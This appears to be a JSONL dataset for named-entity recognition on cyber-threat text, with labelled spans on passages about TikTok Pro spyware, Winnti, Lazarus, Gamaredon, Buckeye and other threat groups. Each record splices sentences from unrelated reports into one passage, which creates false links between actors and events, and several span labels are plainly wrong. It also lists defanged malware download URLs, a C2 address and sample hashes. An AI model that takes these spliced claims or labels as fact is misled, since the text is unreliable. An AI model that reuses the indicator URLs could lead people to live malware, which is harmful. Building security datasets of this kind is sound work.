{"text": "Nevertheless , users should practice proper security hygiene to mitigate threats that may take advantage of a home or business router \u2019 s security gaps . It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . Dropurl : kentona[.su \u2013 47.245.58.124 https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe C2: 217[.12.201.159 TA505 : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 TA505 : 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b TA505 : fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 TA505 : c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a TA505 : 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 .", "spans": [{"start": 190, "end": 199, "label": "Organization"}, {"start": 205, "end": 212, "label": "System"}, {"start": 311, "end": 322, "label": "Indicator"}, {"start": 325, "end": 338, "label": "Indicator"}, {"start": 339, "end": 402, "label": "Indicator"}, {"start": 403, "end": 466, "label": "Indicator"}, {"start": 471, "end": 486, "label": "Indicator"}, {"start": 487, "end": 492, "label": "Organization"}, {"start": 495, "end": 561, "label": "Indicator"}, {"start": 562, "end": 567, "label": "Organization"}, {"start": 570, "end": 634, "label": "Indicator"}, {"start": 635, "end": 640, "label": "Organization"}, {"start": 643, "end": 707, "label": "Indicator"}, {"start": 708, "end": 713, "label": "Organization"}, {"start": 716, "end": 780, "label": "Indicator"}, {"start": 781, "end": 786, "label": "Organization"}, {"start": 789, "end": 853, "label": "Indicator"}]}
{"text": "Employ stronger credentials , for instance , to make them less susceptible to unauthorized access . In recent years , Lazarus has also become involved in financially motivated attacks . Winnti : More than just Windows and Gates .", "spans": [{"start": 118, "end": 125, "label": "Organization"}, {"start": 154, "end": 165, "label": "Organization"}, {"start": 186, "end": 192, "label": "Malware"}, {"start": 210, "end": 217, "label": "System"}]}
{"text": "Regularly update and patch the router \u2019 s software and firmware to prevent exploits , and enable its built-in firewall . This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . The Winnti malware family was first reported in 2013 by Kaspersky Lab .", "spans": [{"start": 126, "end": 133, "label": "System"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 286, "end": 292, "label": "Malware"}, {"start": 338, "end": 351, "label": "Organization"}]}
{"text": "For system administrators and information security professionals , configuring the router to be more resistant to attacks like DNS cache poisoning can help mitigate similar threats . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Since then , threat actors leveraging Winnti malware have victimized a diverse set of targets forvaried motivations .", "spans": [{"start": 183, "end": 190, "label": "Organization"}, {"start": 236, "end": 259, "label": "Organization"}, {"start": 351, "end": 357, "label": "Malware"}]}
{"text": "Everyday users can do the same by checking the router \u2019 s DNS settings if they \u2019 ve been modified . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . While the name \u2018 Winnti \u2019 in public reporting was previously used tosignify a single actor , pronounced divergence in targeting and tradecraft betweencampaigns has led industry consensus to break up the tracking of the continued use ofthe Winnti malware under different actor clusters .", "spans": [{"start": 100, "end": 107, "label": "Organization"}, {"start": 191, "end": 197, "label": "Malware"}, {"start": 413, "end": 419, "label": "Malware"}]}
{"text": "Even threats like DNS cache poisoning employ social engineering , so users should also be more prudent against suspicious or unknown messages that have telltale signs of malware . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . The underlying hypothesis is that themalware itself may be shared ( or sold ) across a small group of actors .", "spans": [{"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 298, "end": 311, "label": "Vulnerability"}]}
{"text": "We have worked with Google and they ensure that Google Play Protect proactively catches apps of this nature . Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . In April 2019 , reports emerged of an intrusion involving Winnti malware at a GermanPharmaceutical company .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 48, "end": 67, "label": "System"}, {"start": 110, "end": 117, "label": "Organization"}, {"start": 417, "end": 423, "label": "Malware"}, {"start": 437, "end": 457, "label": "Organization"}]}
{"text": "No instances of these apps were found in Google Play . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . Following these reports , Chronicle researchers doubled downon efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": [{"start": 41, "end": 52, "label": "System"}, {"start": 66, "end": 73, "label": "Organization"}, {"start": 116, "end": 132, "label": "Organization"}, {"start": 281, "end": 290, "label": "Organization"}, {"start": 372, "end": 378, "label": "Malware"}]}
{"text": "September 08 , 2020 TikTok Spyware A detailed analysis of spyware masquerading as TikTok A recent threat to ban TikTok in the United States has taken the internet by storm and received mixed reactions from social media and internet users . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . Analysisof these larger convoluted clusters is ongoing .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 82, "end": 88, "label": "System"}, {"start": 112, "end": 118, "label": "System"}, {"start": 327, "end": 335, "label": "Organization"}, {"start": 353, "end": 360, "label": "Organization"}]}
{"text": "U.S. President Donald Trump has ordered ByteDance , the parent company of TikTok , to sell its U.S. TikTok assets and also issued executive orders that would ban the social media apps TikTok and WeChat from operating in the U.S. if the sale doesn \u2019 t happen in the next few weeks . The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti samples designed specifically for Linux .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 74, "end": 80, "label": "System"}, {"start": 100, "end": 106, "label": "System"}, {"start": 184, "end": 190, "label": "System"}, {"start": 195, "end": 201, "label": "System"}, {"start": 286, "end": 292, "label": "Organization"}, {"start": 387, "end": 397, "label": "System"}, {"start": 540, "end": 546, "label": "Malware"}, {"start": 562, "end": 572, "label": "Organization"}, {"start": 623, "end": 629, "label": "Malware"}, {"start": 664, "end": 669, "label": "System"}]}
{"text": "On the other side , ByteDance has filed a lawsuit suing the Trump administration . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . The following is a technical analysis of thisvariant .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 149, "end": 167, "label": "Malware"}, {"start": 174, "end": 193, "label": "Malware"}]}
{"text": "When popular applications come under fire and are featured prominently in the news , hackers get excited as these newsworthy apps can become their latest target . It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world . The Linux version of Winnti is comprised of two files : a main backdoor ( libxselinux ) and a library ( libxselinux.so ) used to hide it \u2019s activity on an infected system . \u2018 libxselinux.so \u2019 \u2014 the userland rootkit . libxselinux.so.old : 11a9f798227be8a53b06d7e8943f8d68 906dc86cb466c1a22cf847dda27a434d04adf065 4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a .", "spans": [{"start": 402, "end": 407, "label": "System"}, {"start": 419, "end": 425, "label": "Malware"}, {"start": 472, "end": 483, "label": "Malware"}, {"start": 502, "end": 516, "label": "Indicator"}, {"start": 573, "end": 587, "label": "Indicator"}, {"start": 615, "end": 633, "label": "Indicator"}, {"start": 636, "end": 668, "label": "Indicator"}, {"start": 669, "end": 709, "label": "Indicator"}, {"start": 710, "end": 774, "label": "Indicator"}]}
{"text": "And TikTok is no exception . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . Ids.me .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 166, "end": 174, "label": "System"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 242, "end": 253, "label": "System"}, {"start": 268, "end": 274, "label": "Indicator"}]}
{"text": "Generally , after an application gets banned from an official app store , such as Google Play , users try to find alternative ways to download the app . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . The library used to hide Winnti \u2019s system activity is a copy of the open-source userland rootkit Azazel , with minor changes .", "spans": [{"start": 82, "end": 93, "label": "System"}, {"start": 279, "end": 292, "label": "Organization"}, {"start": 373, "end": 379, "label": "Malware"}, {"start": 445, "end": 451, "label": "System"}]}
{"text": "In doing so , users can become victims to malicious apps portraying themselves as the original app . Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . When executed , it will register symbols for multiple commonly used functions , including : open() , rmdir() , and unlink() , and modify their returns to hide the malware \u2019s operations .", "spans": [{"start": 297, "end": 307, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}, {"start": 444, "end": 450, "label": "System"}, {"start": 453, "end": 460, "label": "System"}, {"start": 467, "end": 475, "label": "System"}]}
{"text": "Recently there was a huge wave of SMS messages , as well as Whatsapp messages , making the rounds asking users to download the latest version of TikTok at hxxp : //tiny [ . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018 Decrypt2 \u2019 , which is used to decode an embedded configuration similar to the core implant .", "spans": [{"start": 60, "end": 68, "label": "System"}, {"start": 145, "end": 151, "label": "System"}, {"start": 155, "end": 172, "label": "Indicator"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 340, "end": 346, "label": "Malware"}, {"start": 401, "end": 409, "label": "System"}]}
{"text": "] cc/TiktokPro . Gamaredon Group is an alleged Russian threat group . Unlike standard Azazel which is configured to hide network activity based on port ranges , the Winnti modified version keeps a list of process identifiers and network connections associated with the malware \u2019s activity .", "spans": [{"start": 17, "end": 32, "label": "Organization"}, {"start": 86, "end": 92, "label": "System"}, {"start": 165, "end": 171, "label": "Malware"}]}
{"text": "In reality , this downloaded app is a fake app that asks for credentials and Android permissions ( including camera and phone permissions ) , resulting in the user being bombarded with advertisements . Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . This modification likely serves to simplify the operator \u2019s sample configuration process by not having to denote specific ports to hide .", "spans": [{"start": 77, "end": 84, "label": "System"}, {"start": 202, "end": 217, "label": "Organization"}, {"start": 310, "end": 330, "label": "Organization"}]}
{"text": "Recently , we have come across another variant of this app portraying itself as TikTok Pro , but this is a full-fledged spyware with premium features to spy on victim with ease . EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user\u2019s microphone and the ability to download and execute further modules . Strings within this sample associated with the malware \u2019s operations are encoded using a single-byte XOR encoding .", "spans": [{"start": 80, "end": 90, "label": "System"}, {"start": 179, "end": 190, "label": "Organization"}, {"start": 215, "end": 234, "label": "System"}, {"start": 237, "end": 250, "label": "System"}, {"start": 262, "end": 287, "label": "System"}]}
{"text": "( Please note this is a different app and not the same as the one being spread by hxxp : //tiny [ . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . The following is an example Python function to decode these strings . libxselinux.old : 7f4764c6e6dabd262341fd23a9b105a3 dc96d0f02151e702ef764bbc234d1e73d2811416 ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 .", "spans": [{"start": 82, "end": 99, "label": "Indicator"}, {"start": 100, "end": 115, "label": "Organization"}, {"start": 192, "end": 199, "label": "System"}, {"start": 230, "end": 236, "label": "System"}, {"start": 272, "end": 287, "label": "Indicator"}, {"start": 290, "end": 322, "label": "Indicator"}, {"start": 323, "end": 363, "label": "Indicator"}, {"start": 364, "end": 428, "label": "Indicator"}]}
{"text": "] cc/TiktokPro . Gamaredon Group's implants are characterized by the employment of information stealing tools \u2014 among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Ids.me .", "spans": [{"start": 17, "end": 34, "label": "Organization"}, {"start": 83, "end": 109, "label": "System"}, {"start": 243, "end": 249, "label": "Indicator"}]}
{"text": ") Technical Analysis App Name : TikTok Pro Hash : 9fed52ee7312e217bd10d6a156c8b988 Package Name : com.example.dat.a8andoserverx Upon installation , the spyware portrays itself as TikTok using the name TikTok Pro . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . Winnti Linux variant \u2019s core functionality is within \u2018 libxselinux \u2019 .", "spans": [{"start": 32, "end": 42, "label": "System"}, {"start": 50, "end": 82, "label": "Indicator"}, {"start": 98, "end": 127, "label": "Indicator"}, {"start": 179, "end": 185, "label": "System"}, {"start": 201, "end": 211, "label": "System"}, {"start": 214, "end": 229, "label": "Organization"}, {"start": 252, "end": 273, "label": "System"}, {"start": 318, "end": 324, "label": "Malware"}, {"start": 325, "end": 330, "label": "System"}, {"start": 373, "end": 384, "label": "Malware"}]}
{"text": "As soon as a user tries to open the app , it launches a fake notification and soon the notification as well as the app icon disappears . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools . Upon execution , an embedded configuration is decoded from the data section using a simple XOR cipher .", "spans": [{"start": 176, "end": 185, "label": "Organization"}, {"start": 207, "end": 210, "label": "System"}, {"start": 325, "end": 338, "label": "Malware"}]}
{"text": "This fake notification tactic is used to redirect the user 's attention , meanwhile the app hides itself , making the user believe the app to be faulty . We can observe that the sample is very recent , created on Thursday , July 4 . The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report .", "spans": [{"start": 178, "end": 184, "label": "Malware"}, {"start": 322, "end": 328, "label": "Malware"}, {"start": 365, "end": 372, "label": "Organization"}]}
{"text": "This functionality can be seen in Figure 1 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . Embedded in this sample \u2019s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators .", "spans": [{"start": 96, "end": 111, "label": "Malware"}, {"start": 133, "end": 143, "label": "Malware"}]}
{"text": "App Icon Figure 1 : App icon and fake notification . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . Winnti ver.1 , these values were designated as \u2018 tag \u2019 and \u2018 group \u2019 .", "spans": [{"start": 57, "end": 76, "label": "Malware"}, {"start": 82, "end": 92, "label": "System"}, {"start": 139, "end": 145, "label": "Malware"}]}
{"text": "Behind the scenes , there are number of process occurring simultaneously . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . For context , embedded Winnti campaign designators have ranged from target names , geographic areas , industry , and profanity .", "spans": [{"start": 75, "end": 86, "label": "Malware"}, {"start": 98, "end": 110, "label": "Malware"}, {"start": 210, "end": 216, "label": "Malware"}]}
{"text": "First , an activity named MainActivity fires up , taking care of hiding the icon and showing the fake notification . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . Winnti malware handles outbound communications using multiple protocols including : ICMP , HTTP , as well as custom TCP and UDP protocols .", "spans": [{"start": 152, "end": 157, "label": "Organization"}, {"start": 293, "end": 299, "label": "Malware"}, {"start": 377, "end": 381, "label": "Indicator"}, {"start": 384, "end": 388, "label": "Indicator"}, {"start": 409, "end": 412, "label": "Indicator"}, {"start": 417, "end": 420, "label": "Indicator"}]}
{"text": "It also starts an Android service named MainService . Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 54, "end": 75, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 236, "end": 245, "label": "Organization"}]}
{"text": "The spyware also appears to have an additional payload stored under the /res/raw/ directory . Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes . While the outbound communication mechanisms are well documented , less attention has been paid to a feature of recent versions of Winnti we came across in the Linux variant ( as well as Windows ) that allows the operators to initiate a connection directly to an infected host , without requiring a connection to a control server .", "spans": [{"start": 94, "end": 108, "label": "Organization"}, {"start": 371, "end": 377, "label": "Malware"}, {"start": 400, "end": 405, "label": "System"}, {"start": 427, "end": 434, "label": "System"}]}
{"text": "This is a common technique used by malware developers to bundle the main payload inside the Android package to avoid easy detection . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted .", "spans": [{"start": 92, "end": 99, "label": "System"}, {"start": 162, "end": 174, "label": "Organization"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 225, "end": 238, "label": "Organization"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 300, "end": 310, "label": "Organization"}, {"start": 315, "end": 322, "label": "Organization"}]}
{"text": "As seen in Figure 2 , the app tries to open the payload from the /res/raw/ directory and generate an additional Android Package Kit ( APK ) named .app.apk : Decoy Code Figure 2 : The decoy code for the fake TikTok . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . Additionally , the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts .", "spans": [{"start": 112, "end": 131, "label": "System"}, {"start": 146, "end": 154, "label": "Indicator"}, {"start": 207, "end": 213, "label": "System"}, {"start": 312, "end": 333, "label": "Organization"}, {"start": 344, "end": 353, "label": "Organization"}, {"start": 358, "end": 377, "label": "Organization"}]}
{"text": "Upon analysis , we discovered that this is a decoy functionality and no new payload is generated . Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems . This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts .", "spans": [{"start": 99, "end": 120, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 411, "end": 425, "label": "System"}, {"start": 434, "end": 442, "label": "System"}]}
{"text": "The conditions to build an additional payload are never met . In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . Initial technical information about this feature was shared by the Thyssenkrupp CERT in the form of an Nmap script that could be used to identify Winnti infections through network scanning .", "spans": [{"start": 81, "end": 95, "label": "Organization"}, {"start": 247, "end": 264, "label": "Organization"}, {"start": 283, "end": 287, "label": "System"}, {"start": 326, "end": 332, "label": "Malware"}]}
{"text": "Going one step further , we rebuilt the malware to execute the apparent functionality of generating a payload , but discovered that the APK stored in the /res/raw/ directory is empty . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . This script identifies infected hosts by first sending a custom hello packet , immediately followed by an encoded request for host information , and then parsing the response .", "spans": [{"start": 189, "end": 192, "label": "Malware"}, {"start": 282, "end": 290, "label": "Malware"}, {"start": 295, "end": 302, "label": "Malware"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 316, "end": 323, "label": "Malware"}, {"start": 326, "end": 332, "label": "Malware"}, {"start": 335, "end": 353, "label": "Malware"}]}
{"text": "The placement of the decoy functionality is likely designed to confuse the malware researchers . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . The initial request , referred to as the helo/hello request in the Nmap script , is comprised of four DWORDs .", "spans": [{"start": 162, "end": 169, "label": "Organization"}, {"start": 227, "end": 260, "label": "Organization"}, {"start": 330, "end": 334, "label": "System"}, {"start": 365, "end": 371, "label": "System"}]}
{"text": "It is also possible that this functionality is under development , making this placeholder code incomplete . Cylance determined that the \u2018Ghost Dragon\u2019 group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . The first three are generated by rand() and the fourth is computed based on the first and third .", "spans": [{"start": 109, "end": 116, "label": "Organization"}, {"start": 137, "end": 151, "label": "Organization"}, {"start": 201, "end": 210, "label": "System"}, {"start": 330, "end": 336, "label": "System"}]}
{"text": "Coming back to the execution flow , once the spyware hides itself , it starts an Android service named MainService . The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes \u2018Gh0st\u2019 as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . When received by a Winnti infected host , it will validate the received packet and listen for a second inbound request containing tasking .", "spans": [{"start": 81, "end": 88, "label": "System"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 173, "end": 189, "label": "System"}, {"start": 356, "end": 362, "label": "Malware"}]}
{"text": "Android services are components that can be made to execute independently in the background without the victim 's knowledge . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . This second request ( Encoded Get System Information Request ) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers , which uses a four-byte XOR encoding .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 167, "end": 176, "label": "Malware"}, {"start": 187, "end": 199, "label": "Organization"}, {"start": 436, "end": 439, "label": "Indicator"}]}
{"text": "MainService is the brain of this spyware and controls almost everything\u2014from stealing the victim 's data to deleting it . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . Before acting on the request , Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking .", "spans": [{"start": 181, "end": 193, "label": "Organization"}, {"start": 227, "end": 233, "label": "Malware"}, {"start": 258, "end": 263, "label": "System"}]}
{"text": "All of its capabilities are discussed later in this blog . Exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . Clusters of Winnti related activity have become a complex topic in threat intelligence circles , with activity vaguely attributed to different codenamed threat actors .", "spans": [{"start": 104, "end": 113, "label": "Organization"}, {"start": 159, "end": 165, "label": "Malware"}]}
{"text": "Hide Icon Figure 3 : Code showing the hiding icon and starting service . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . The threat actors utilizing this toolset have repeatedly demonstrated their expertise in compromising Windows based environments .", "spans": [{"start": 77, "end": 84, "label": "Organization"}, {"start": 108, "end": 128, "label": "System"}, {"start": 332, "end": 339, "label": "System"}]}
{"text": "As MainService is the main controller , the developer has taken the appropriate actions to keep it functional and running at all times . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . An expansion into Linux tooling indicates iteration outside of their traditional comfort zone .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 276, "end": 281, "label": "System"}]}
{"text": "The malware developer uses various tactics to do so , and one of them is using Android 's broadcast receivers . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises , as is with Penquin Turla and APT28 \u2019s Linux XAgent variant .", "spans": [{"start": 79, "end": 86, "label": "System"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 173, "end": 193, "label": "System"}, {"start": 274, "end": 276, "label": "System"}, {"start": 431, "end": 444, "label": "Malware"}, {"start": 449, "end": 454, "label": "Organization"}, {"start": 458, "end": 463, "label": "System"}, {"start": 464, "end": 470, "label": "System"}]}
{"text": "Broadcast receivers are components that allow you to register for various Android events . The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years . Utilizing a passive listener as a communications channel is characteristic of the Winnti developers \u2019 foresight in needing a failsafe secondary command-and-control mechanisms .", "spans": [{"start": 74, "end": 81, "label": "System"}, {"start": 134, "end": 150, "label": "Organization"}, {"start": 340, "end": 346, "label": "Malware"}]}
{"text": "In this case , it registers three broadcast receivers : MyReceiver - Triggers when the device is booted . However , Symantec has now found evidence that the Buckeye cyber espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak . BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group .", "spans": [{"start": 116, "end": 124, "label": "Organization"}, {"start": 157, "end": 164, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 199, "end": 211, "label": "Organization"}, {"start": 226, "end": 246, "label": "System"}, {"start": 309, "end": 319, "label": "Organization"}, {"start": 390, "end": 401, "label": "Organization"}]}
{"text": "Intercept Call - Triggers on incoming and outgoing calls . Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed . The group has shown interest in prominent figures in the United Nations , as well as opposition bloggers , activists , regional news correspondents , and think tanks .", "spans": [{"start": 59, "end": 67, "label": "Organization"}, {"start": 155, "end": 160, "label": "System"}, {"start": 424, "end": 435, "label": "System"}]}
{"text": "AlarmReceiver - Triggers every three minutes . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . A group known by Microsoft as NEODYMIUM is Oreportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": [{"start": 47, "end": 59, "label": "Organization"}, {"start": 100, "end": 112, "label": "System"}, {"start": 205, "end": 214, "label": "Organization"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 267, "end": 277, "label": "Organization"}]}
{"text": "MyReceiver and AlarmReceiver start the MainService whenever appropriate events occur . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . BRONZE BUTLER : REDBALDKNIGHT , Tick .", "spans": [{"start": 118, "end": 140, "label": "Vulnerability"}, {"start": 171, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 198, "end": 211, "label": "Organization"}, {"start": 214, "end": 218, "label": "Organization"}]}
{"text": "This tactic is very common among malware developers to ensure the malware is not killed by the Android OS or by any other means . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008 .", "spans": [{"start": 95, "end": 102, "label": "System"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 160, "end": 175, "label": "Vulnerability"}, {"start": 249, "end": 262, "label": "Organization"}]}
{"text": "Figure 4 shows MyReceiver in action where it eventually calls the MainService service . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak . The group primarily targets Japanese organizations , particularly those in government , biotechnology , electronics manufacturing , and industrial chemistry .", "spans": [{"start": 107, "end": 120, "label": "Vulnerability"}, {"start": 299, "end": 313, "label": "Organization"}, {"start": 396, "end": 406, "label": "Organization"}]}
{"text": "Broadcast Receiver Figure 4 : MyReceiver broadcast receiver . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . Carbanak : Anunak , Carbon Spider .", "spans": [{"start": 81, "end": 89, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 169, "end": 175, "label": "Organization"}, {"start": 178, "end": 191, "label": "Organization"}]}
{"text": "The InterceptCall receiver is triggered whenever there is an incoming or outgoing call . How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown . Carbanak is a threat group that mainly targets banks .", "spans": [{"start": 93, "end": 100, "label": "Organization"}, {"start": 110, "end": 130, "label": "System"}, {"start": 198, "end": 206, "label": "Organization"}]}
{"text": "It sets particular parameters in relation to call details and a further service named calls takes the control as seen in Figure 5 . The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S . It also refers to malware of the same name ( Carbanak ) .", "spans": [{"start": 136, "end": 143, "label": "Organization"}, {"start": 343, "end": 351, "label": "Malware"}]}
{"text": "Call Service Figure 5 : Code for the calls service As seen above , the calls service stores incoming call details in .mp3 format in the /sdcard/DCIM/.dat/ directory with file name appended with \" In_ '' for incoming calls and \" Out_ '' for outgoing calls . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . It is sometimes referred to as FIN7 , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": [{"start": 271, "end": 284, "label": "Vulnerability"}, {"start": 327, "end": 340, "label": "Vulnerability"}, {"start": 382, "end": 386, "label": "Organization"}, {"start": 438, "end": 446, "label": "Malware"}]}
{"text": "How these recorded calls are sent to the command and control server ( CnC ) is taken care of by MainService , which is discussed next . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government .", "spans": [{"start": 190, "end": 204, "label": "Organization"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 410, "end": 430, "label": "Organization"}]}
{"text": "MainService is the central controller of this spyware . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency sevises .", "spans": [{"start": 203, "end": 215, "label": "System"}, {"start": 216, "end": 224, "label": "System"}, {"start": 231, "end": 240, "label": "System"}, {"start": 241, "end": 250, "label": "System"}, {"start": 261, "end": 272, "label": "System"}, {"start": 275, "end": 289, "label": "System"}, {"start": 296, "end": 310, "label": "System"}, {"start": 311, "end": 318, "label": "System"}, {"start": 319, "end": 324, "label": "System"}, {"start": 327, "end": 332, "label": "Organization"}]}
